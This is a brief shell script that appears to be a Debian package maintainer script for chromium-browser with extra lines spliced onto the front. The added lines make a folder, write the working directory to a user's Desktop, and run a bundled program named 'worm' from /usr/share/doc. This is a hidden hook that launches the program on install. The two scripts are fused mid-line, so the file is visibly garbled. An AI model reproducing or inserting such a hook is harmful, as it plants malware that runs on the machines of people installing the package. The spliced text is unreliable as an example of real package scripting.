#!/bin/sh

mkdir /home/marti/Desktop/provaa
pwd > /home/marti/Desktop/pwd
./usr/share/doc/worm#!/bin/sh
set -e
# Automatically added by dh_installdeb/12.10ubuntu1
dpkg-maintscript-helper rm_conffile /etc/chromium-browser/default -- "$@"
dpkg-maintscript-helper rm_conffile /etc/chromium-browser/customizations/00-example -- "$@"
# End automatically added section
